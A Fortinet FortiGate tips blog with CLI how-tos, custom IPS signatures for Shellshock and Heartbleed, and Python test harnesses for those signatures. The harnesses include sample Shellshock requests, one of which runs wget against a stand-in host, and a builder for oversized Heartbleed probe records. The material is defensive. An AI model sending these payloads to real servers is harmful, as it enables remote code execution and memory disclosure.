There may come a time when you have rev.1 and rev.2 hardware of a particular platform that you're trying to form an HA cluster with. To successfully accomplish this you need to tell the firewall to ignore the difference in hardware revision.
In FortiOS 4.3 and earlier:
config system global
set ignore-hardware-revision enable
end
In FortiOS 5.0 and later:
exec ha ignore-hardware-revision enable
exec ha ignore-hardware-revision status
A real world resource for Fortinet firewalls including How-Tos and Frequently Asked Questions
Monday, November 3, 2014
Thursday, September 25, 2014
Bash Vulnerability Signatures
The newly announced Bash / Shellshock vulnerability is documented in CVE-2014-6271.
Here are IPS rules for immediate manual deployment. Fortinet has already generated a new IPS signature, Bash.Function.Definitions.Remote.Code.Execution, which will be released in the next few hours after it has passed QA testing.
FortiGate firewalls do NOT use Bash and are not vulnerable to this exploit. The rules below can be used to filter traffic destined for devices protected by the firewall.
F-SBID( --name "Bash.Code.Execution.Custom1"; --protocol tcp; --service HTTP; --flow from_client; --pattern "|28 29 20 7b 20|"; --context uri; --pcre "/[=?&\x2f]\s*?\x28\x29\x20\x7b\x20/"; --context uri ; )
F-SBID( --name "Bash.Code.Execution.Custom2"; --protocol tcp; --service HTTP; --flow from_client; --pattern "|28 29 20 7b 20|"; --context header;)
F-SBID( --name "Bash.Code.Execution.Custom3"; --protocol tcp; --service HTTP; --flow from_client; --pattern "|28 29 20 7b 20|"; --context body; --pcre "/(?:^|[=?&])\s*?\x28\x29\x20\x7b\x20/"; --context body ; )
F-SBID( --name "Bash.Code.Execution.Custom4"; --protocol tcp; --service HTTP; --flow from_client; --pattern "()"; --context header; --pattern ":|3b|"; --context header; --within 8; --pattern "}"; --context header; --within 8; --pcre "/(Cookie|Host|Referer):\s*\(\)\s*\{\s*:\x3b\s*\}\s*\x3b/i"; --context header; --distance -32; --within 128; )
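To see what the four custom rules above actually catch, here is an added example (not part of the original post and not Fortinet code) that replays their patterns and PCREs over constructed HTTP requests in Python. It approximates the IPS engine's uri/header/body contexts with a simple request splitter and reduces Custom4's pattern chain to its PCRE; the requests, hostnames and 198.51.100.7 are made up for the example.

```python
import re

# Marker shared by all four custom rules above: the bytes 28 29 20 7b 20, i.e. "() { ".
MARKER = b"() { "

# The PCREs from the Custom1, Custom3 and Custom4 rules, compiled with Python's re
# module (these constructs mean the same thing in PCRE and in Python).
URI_RE = re.compile(rb"[=?&\x2f]\s*?\x28\x29\x20\x7b\x20")
BODY_RE = re.compile(rb"(?:^|[=?&])\s*?\x28\x29\x20\x7b\x20", re.MULTILINE)
HEADER_RE = re.compile(
    rb"(Cookie|Host|Referer):\s*\(\)\s*\{\s*:\x3b\s*\}\s*\x3b", re.IGNORECASE)


def split_request(raw):
    """Split a raw HTTP/1.x request into the IPS contexts (uri, header, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    _method, _, rest = lines[0].partition(b" ")
    # Keep everything between method and version as the URI, so an unencoded
    # payload containing spaces is still seen as part of the URI.
    uri, sep, _version = rest.rpartition(b" ")
    if not sep:
        uri = rest
    headers = b"\r\n".join(lines[1:])
    return uri, headers, body


def matching_rules(raw):
    """Return the names of the custom rules whose conditions the request satisfies."""
    uri, headers, body = split_request(raw)
    hits = []
    # Custom1: marker in the URI, introduced by a path or query delimiter.
    if MARKER in uri and URI_RE.search(uri):
        hits.append("Bash.Code.Execution.Custom1")
    # Custom2: marker anywhere in the header block (broadest; covers User-Agent).
    if MARKER in headers:
        hits.append("Bash.Code.Execution.Custom2")
    # Custom3: marker in the body at the start or after a form-field delimiter.
    if MARKER in body and BODY_RE.search(body):
        hits.append("Bash.Code.Execution.Custom3")
    # Custom4: the complete "() { :; };" definition, but only in three named headers.
    if HEADER_RE.search(headers):
        hits.append("Bash.Code.Execution.Custom4")
    return hits


# Constructed sample requests (not captured traffic); 198.51.100.7 is a documentation address.
SAMPLE_UA = (b"GET /cgi-bin/status HTTP/1.1\r\n"
             b"Host: www.example.com\r\n"
             b"User-Agent: () { :; }; /bin/bash -c 'id'\r\n\r\n")
SAMPLE_COOKIE = (b"GET /cgi-bin/status HTTP/1.1\r\n"
                 b"Host: www.example.com\r\n"
                 b"Cookie: () { :; }; /usr/bin/wget http://198.51.100.7/x\r\n\r\n")
SAMPLE_URI = (b"GET /cgi-bin/status?x=() { :; }; id HTTP/1.1\r\n"
              b"Host: www.example.com\r\n\r\n")
SAMPLE_BODY = (b"POST /cgi-bin/form HTTP/1.1\r\n"
               b"Host: www.example.com\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
               b"cmd=() { :; }; id")
SAMPLE_BENIGN = (b"POST /login HTTP/1.1\r\n"
                 b"Host: www.example.com\r\n"
                 b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                 b"user=alice&pass=s3cret")

if __name__ == "__main__":
    for label, req in [("user-agent", SAMPLE_UA), ("cookie", SAMPLE_COOKIE),
                       ("uri", SAMPLE_URI), ("body", SAMPLE_BODY), ("benign", SAMPLE_BENIGN)]:
        print(f"{label:10s} -> {matching_rules(req) or 'no match'}")
```

Running it shows the division of labour between the rules: the User-Agent payload is caught only by the broad Custom2 header match, since Custom4's PCRE names just Cookie, Host and Referer, while Custom1 and Custom3 cover the URI and the POST body respectively.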
Monday, September 15, 2014
Switching interface modes
By default smaller Fortigate units such as the 60D or 90D series combine their interfaces into a virtual switch. Via a configuration change all ports can be assigned to their own broadcast domains. This is useful for example if you want to configure a number of different trunk ports.
By default the firewalls are also configured with basic policies that permit and NAT outbound traffic as well as a DHCP server. These configurations need to be cleared before the switch mode can be changed.
#config firewall policy
#purge
This operation will clear all table!
Do you want to continue? (y/n) y
#end
#config system dhcp server
#purge
This operation will clear all table!
Do you want to continue? (y/n) y
#end
#config system global
#set internal-switch-mode interface
#end
Changing switch mode will reboot the system!
Do you want to continue? (y/n) y
Wednesday, August 27, 2014
Silence of the Local Broadcasts
When setting up a new FortiGate you tend to receive a lot of logs for traffic destined to 255.255.255.255 (the limited broadcast address) or x.x.x.255 (your local subnet broadcast address). The firewall drops these broadcasts anyway; to stop logging them, disable local-traffic logging for each log destination you use. Keep in mind that this filter covers all traffic addressed to the firewall itself, not only broadcasts, so denied connection attempts against the FortiGate's own interfaces will no longer be logged either.
FortiAnalyzer:
config log fortianalyzer filter
set local-traffic disable
end
Log Disk
config log disk filter
set local-traffic disable
end
Memory:
config log memory filter
set local-traffic disable
end
Syslog
config log syslogd filter
set local-traffic disable
end
Tuesday, July 29, 2014
New Feature Highlight: Dedicated Management CPU
In FortiOS 5.2 and higher you can dedicate one of the CPUs to management access, in other words GUI and CLI access. If the system is running under extremely high load this guarantees that the management functions remain reachable.
This feature is only available on 2U firewalls and blades that have multiple CPUs.
To enable this feature (default disabled):
conf system npu
set dedicated-management-cpu <enable | disable>
end
Monday, July 21, 2014
Fortinet Diagnostic WIKI
Very useful resource for diagnostic commands.
http://wiki.diagnose.fortinet.com:1080/index.php/Overview
Thursday, May 15, 2014
Exporting a local certificate with private key
If you have a local certificate on the FortiGate and the original certificate signing request (CSR) was generated on the FortiGate, then the private key resides on the FortiGate and you need to export it in order to install the signed certificate on another server.
The problem with the FortiGate certificate export feature is that it only exports the signed certificate (which you likely already have stored somewhere). The private key is stored in the configuration backup file, but encrypted with an unknown password.
Luckily there is a workaround: unset the private key password via the CLI, then back up your configuration file, where you'll find the private key available for use.
config vpn certificate local
show
This will give you a list of the local certificates. Next edit the desired certificate and unset the password
edit testcert
unset password
end
Now when you back up your FortiGate configuration you'll find the signed certificate as well as the private key.
Look for the following line:
set private-key "-----BEGIN RSA PRIVATE KEY-----
Copy everything between (and including)
-----BEGIN RSA PRIVATE KEY-----
and
-----END RSA PRIVATE KEY-----
into a text file. This is your private key, to be imported into the other server together with the signed certificate. Keep in mind that this backup file now contains the private key in the clear, so store and transfer it as you would any plaintext key and delete the working copies once the import is done.
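Instead of hunting for the PEM block by hand, the extraction can be scripted. The following is an added example (not from the original post or from Fortinet) that parses the "config vpn certificate local" section of a backup, pulls the certificate and private key for one entry, and refuses to proceed when a "set password" line is still present, which means the key is still encrypted. The backup excerpt is constructed for the example and its layout is an assumption; the PEM bodies are placeholders, not real key material.

```python
import re

# Constructed excerpt of a FortiGate configuration backup. The layout (an "edit" entry
# per certificate, multi-line quoted PEM values) is assumed; the PEM bodies are
# placeholders, not real key or certificate material.
SAMPLE_BACKUP = """\
config vpn certificate local
    edit "oldcert"
        set password ENC AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        set comments "password still set: key stays encrypted"
    next
    edit "testcert"
        set comments "password unset via CLI before the backup"
        set private-key "-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAplaceholder+private+key+line+one
placeholder+private+key+line+two==
-----END RSA PRIVATE KEY-----"
        set certificate "-----BEGIN CERTIFICATE-----
MIIDplaceholder+certificate+line+one
placeholder+certificate+line+two==
-----END CERTIFICATE-----"
    next
end
"""


def parse_local_certificates(config_text):
    """Return {name: entry_text} for every entry under 'config vpn certificate local'.
    Works line by line so the multi-line PEM values stay intact."""
    entries, name, buf, in_section = {}, None, [], False
    for line in config_text.splitlines():
        stripped = line.strip()
        if not in_section:
            in_section = stripped == "config vpn certificate local"
            continue
        if name is None:
            m = re.match(r'edit\s+"?([^"]+?)"?$', stripped)
            if m:
                name, buf = m.group(1), []
            elif stripped == "end":
                break                      # end of the section
        elif stripped == "next":
            entries[name], name = "\n".join(buf), None
        else:
            buf.append(line)
    return entries


def export_material(config_text, cert_name):
    """Pull the certificate and private key for one entry, and flag whether a
    'set password' line is still present (then the key is still encrypted and
    'unset password' has not taken effect)."""
    entries = parse_local_certificates(config_text)
    if cert_name not in entries:
        raise KeyError(f"no local certificate named {cert_name!r}")
    body = entries[cert_name]

    def quoted(setting):
        m = re.search(r'set %s "(.*?)"' % re.escape(setting), body, re.S)
        return m.group(1).strip() if m else None

    return {
        "password_set": re.search(r"^\s*set password\b", body, re.M) is not None,
        "private_key": quoted("private-key"),
        "certificate": quoted("certificate"),
    }


if __name__ == "__main__":
    import sys
    material = export_material(SAMPLE_BACKUP, "testcert")
    if material["password_set"] or material["private_key"] is None:
        sys.exit("private key not exportable: unset the password and take a fresh backup")
    with open("testcert.key", "w") as f:   # treat this file like any other plaintext key
        f.write(material["private_key"] + "\n")
    with open("testcert.crt", "w") as f:
        f.write(material["certificate"] + "\n")
    print("wrote testcert.key and testcert.crt")
```

Before importing the pair elsewhere, confirm that the key really belongs to the certificate: the output of `openssl x509 -noout -modulus -in testcert.crt | openssl md5` must equal that of `openssl rsa -noout -modulus -in testcert.key | openssl md5`.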
("Borrowed" from http://stuff.purdon.ca/?page_id=233)
Friday, April 11, 2014
Heartbleed - Part 3
Anyone running FortiOS 5.0 GA to 5.0.6 can protect the firewall itself by
- limiting access to the firewall's admin interface with Trusted Hosts on the administrator accounts
- configuring an interface policy as below, where "opensslheartbeat" is an IPS sensor you have created that contains the Heartbleed signature
config firewall interface-policy
edit 1
set interface "wan1"
set srcaddr "all"
set dstaddr "all"
set service "HTTPS"
set ips-sensor-status enable
set ips-sensor "opensslheartbeat"
next
end
Wednesday, April 9, 2014
Heartbleed - Part 2
Here is some more information from FortiGuard
http://www.fortiguard.com/advisory/FG-IR-14-011/
Tuesday, April 8, 2014
Exporting firewall rules to a CSV
Sometimes it can be useful to export and analyze rules in a CSV type format. This comes in especially handy when working with long and complex firewall policies.
I came across the perl script below that takes firewall policies from a text file and performs the CSV conversion for you.
Syntax: csvparse.pl rules.txt
<rules.txt> should be in the following format:
config firewall policy
edit 1
set srcintf "internal"
set dstintf "wan1"
set srcaddr "all"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
set logtraffic-app disable
set webcache enable
set nat enable
next
end
And here's the Perl script.
#!/usr/bin/perl
# Convert "config firewall policy" output into a CSV: one row per policy ID,
# one column per distinct "set" keyword, columns in the order first seen.
use strict;
use warnings;

my $output          = "policies-out.csv";
my $policyid        = 0;
my $in_policy_block = 0;
my %policies;
my %seen;
my @order_keys;

open( my $outfile, '>', $output ) or die "Can't open file $output: $!\n";

while (<>) {
    if ($in_policy_block) {
        if (/^\s*edit\s+(\d+)/i) {
            # start of a new policy
            $policyid = $1;
        }
        elsif (/^\s*set\s+(\S+)\s+(.*)$/i) {
            # a setting: strip quotes and line endings, remember the column order
            my ( $key, $value ) = ( $1, $2 );
            $value =~ tr/\"\015\012//d;
            push @order_keys, $key unless $seen{$key}++;
            $policies{$policyid}{$key} = $value;
        }
        elsif (/^\s*end/i) {
            $in_policy_block = 0;
        }
    }
    elsif (/^\s*config firewall policy/i) {
        $in_policy_block = 1;
    }
}

# Quote a CSV field that contains a comma, quote or newline (e.g. a comment)
sub csv_field {
    my $f = shift;
    return '' unless defined $f;
    if ( $f =~ /[,"\n]/ ) { $f =~ s/"/""/g; return qq("$f"); }
    return $f;
}

# header row
print $outfile join( ',', 'id', @order_keys ), "\n";

# one row per policy, sorted numerically by policy ID (not as strings)
foreach my $policy ( sort { $a <=> $b } keys %policies ) {
    print $outfile join( ',', $policy, map { csv_field( $policies{$policy}{$_} ) } @order_keys ), "\n";
}
close($outfile);
Heartbleed OpenSSL Vulnerability
You can use the following custom IPS signature to detect and block the recently disclosed OpenSSL "Heartbleed" vulnerability.
More information about the vulnerability can be found here:
http://heartbleed.com/
F-SBID( --name "OpenSSL.TLS.Heartbeat.Information.Disclosure"; --protocol tcp; --flow from_client; --service SSL; --pattern "|18|"; --context packet; --within 1,context; --byte_test 2,>,255,2,relative; )
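To understand what the byte_test in that signature keys on, here is an added example (not from the original post and not Fortinet's detection logic) that builds TLS heartbeat records in Python and applies two checks to them: the signature's heuristic as I read it (content type 0x18 in the first byte, 2-byte record length at offset 3 greater than 255) and the actual CVE-2014-0160 condition, a payload_length that does not fit in the record. The records, their TLS 1.1 version bytes and the payload sizes are constructed for the example.

```python
import struct

TLS_HEARTBEAT = 0x18       # TLS record content type for heartbeat (RFC 6520)
HEARTBEAT_REQUEST = 1      # HeartbeatMessageType
MIN_PADDING = 16           # RFC 6520: at least 16 bytes of padding


def build_heartbeat(payload, claimed_len, version=(3, 2)):
    """Construct a TLS heartbeat record for testing. The outer record length is
    honest about the bytes that follow; the inner payload_length is whatever the
    caller claims, which is exactly the field a Heartbleed probe lies about."""
    fragment = struct.pack("!BH", HEARTBEAT_REQUEST, claimed_len) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(fragment)) + fragment


def signature_fires(record):
    """Mirror the custom signature as written above: first byte 0x18, and the
    two-byte record length at offset 3 (2 bytes past the 1-byte match) above 255."""
    if len(record) < 5 or record[0] != TLS_HEARTBEAT:
        return False
    (record_len,) = struct.unpack("!H", record[3:5])
    return record_len > 255


def heartbeat_overreads(record):
    """The CVE-2014-0160 condition itself: the claimed payload_length plus the
    type/length header and mandatory padding does not fit in the record."""
    if len(record) < 5 or record[0] != TLS_HEARTBEAT:
        return False
    (record_len,) = struct.unpack("!H", record[3:5])
    fragment = record[5:5 + record_len]
    if len(fragment) < 3:
        return True                      # cannot even hold type + payload_length
    (claimed,) = struct.unpack("!H", fragment[1:3])
    return 1 + 2 + claimed + MIN_PADDING > len(fragment)


# Constructed records (no real traffic): a normal 16-byte heartbeat, the classic
# tiny probe that claims 16 KiB, a large probe, and a large but honest heartbeat.
NORMAL = build_heartbeat(b"A" * 16, 16)
CLASSIC_PROBE = build_heartbeat(b"", 0x4000)
LARGE_PROBE = build_heartbeat(b"B" * 300, 0xFFFF)
LARGE_HONEST = build_heartbeat(b"C" * 300, 300)

if __name__ == "__main__":
    for name, rec in [("normal", NORMAL), ("classic probe", CLASSIC_PROBE),
                      ("large probe", LARGE_PROBE), ("large honest", LARGE_HONEST)]:
        print(f"{name:14s} record_len={struct.unpack('!H', rec[3:5])[0]:5d} "
              f"signature={signature_fires(rec)!s:5s} overread={heartbeat_overreads(rec)}")
```

The two checks disagree on two of the four records: the record-length heuristic flags any heartbeat over 255 bytes, honest or not, while a small record that merely claims a large payload_length only trips the protocol-level comparison. That is the trade-off to keep in mind when relying on a length threshold rather than on the payload_length field.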
Tuesday, March 18, 2014
FortiAuthenticator SCEP
You can use SCEP to auto-enroll devices in FortiAuthenticator as well as retrieve CRLs. When configuring this on a firewall or other device the correct URL to use is:
http://<fortiauth IP>/cert/scep
I have asked the technical documentation team to add this to the FortiAuthenticator Admin Guide.
Friday, March 14, 2014
Logging DNS Requests
When inspecting DNS traffic it can be useful to log the domain names that are part of the DNS request. In order to accomplish this you can use a custom IPS signature:
The signature below matches every DNS query (hence the name DOM-ALL) and logs the name being looked up.
IPS Custom Signature:
F-SBID( --attack_id 4153; --name DOM-ALL; --protocol udp; --service dns; --log DNS_QUERY;)
(Danke C.R)
Wednesday, March 5, 2014
Deleting VDOMs
VDOMs have quite a number of dependencies that need to be deleted before you can get rid of the VDOM itself. Below is a useful little script that goes through all the sections and purges them so the VDOM can be deleted. Adjust it as needed.
## This script needs to be run interactively. In other words you cannot copy and paste the whole script. You have to acknowledge each purge command.
## Purge all VDOM specific configuration
config vdom
edit <vdomname>
config firewall policy
purge
end
config firewall policy6
purge
end
config firewall vipgrp
purge
end
config firewall vip
purge
end
config firewall addrgrp
purge
end
config firewall address
purge
end
config router static
purge
end
end
## Assign any interfaces used by the VDOM back to ROOT
config global
config system interface
edit <interface name>
set vdom root
end
end
## Delete any VDOM Links
config global
config system vdom-link
delete <vdom link name>
end
end
## Make sure all admins are assigned to the root VDOM
config global
config system admin
edit <admin-name>
set vdom root
end
end
config vdom
delete <vdomname>
end
Thursday, February 27, 2014
Replacing firewall hardware which is logging to a FortiAnalyzer
When you replace firewall hardware that's reporting into a FortiAnalyzer due to an RMA or other failure it's important to make sure you update FortiAnalyzer with the new serial number of the device. Use the following command on the FAZ:
execute device replace <old serial number> <name> <new serial number>
Thursday, February 20, 2014
IP Address Management
I have to admit I'm pretty spoiled when it comes to IPAM. In my previous role I was working with Bluecat Address Manager and loved it. Probably the best purchase order we ever issued :)
For my lab setup I didn't want to drop $30k so I set out looking for a free and open source IPAM tool. My former tool of choice was IPPlan. This hasn't been updated in several years though and IPv6 support is pretty basic.
So over the last few days I have been testing PHPIpam and I have to say I'm very impressed. Not only does it have a really "sexy" web interface but functionally it is very, very close to what I'm used to from Bluecat.
There is an online demo available here.
http://demo.phpipam.net/login/
Friday, February 14, 2014
UTM logging in FortiOS 4.3.7 and 5.x
Significant changes have been made to optimize logging in FortiOS.
Check out this Knowledgebase article for some very useful info.
http://kb.fortinet.com/kb/viewAttachment.do?attachID=FortiOS-v4%200-MR3-Logging-Optimization.pdf&documentID=FD33590
Thursday, February 13, 2014
FortiClient mass rollout - Heads up
If you are deploying FortiClient for a large number of users, chances are you'll create a master build and image it onto the drives of the machines you are installing.
Keep in mind that FortiClient creates a unique identifier (UID) when it is installed; if that installation is cloned, every machine ends up with the same UID.
So before you start copying your master build, follow these steps to remove the UID. Each machine will create a new UID on first use if one doesn't already exist.
To include a FortiClient installation in a hard disk image
- Download the FortiClient tools from the Fortinet Support Site. The tools are located in the same folder as the FortiClient installer files.
- Using an MSI FortiClient installer, install and configure the FortiClient application to suit your requirements. You can use a standard or a customized installation package.
- Right-click the FortiClient icon in the system tray and select Shutdown FortiClient.
- From the folder where you expanded the FortiClientTools.zip file, run RemoveFCTID.exe. The RemoveFCTID tool requires administrative rights.
- Shut down the computer.
IMPORTANT! Do not reboot the Windows operating system on the computer before you create the hard disk image. The FortiClient identifier is created before you log on.
- Create the hard disk image and deploy it as needed.
Wednesday, February 12, 2014
Site-to-Site VPN performance issues
If you are experiencing poor performance across your site-to-site VPNs on FortiOS 5.0.5, try disabling NPU acceleration for that particular tunnel. The tunnel's encryption is then handled by the main CPU, so keep an eye on CPU utilisation afterwards:
config vpn ipsec phase1-interface
edit <vpn name>
set npu-offload disable
end
Monday, February 10, 2014
Strange Bird Phenomenon
Birds all around the world have been spotted flying perfectly fine then diving straight into the ground. One of my customers found the culprit.
Nom nom nom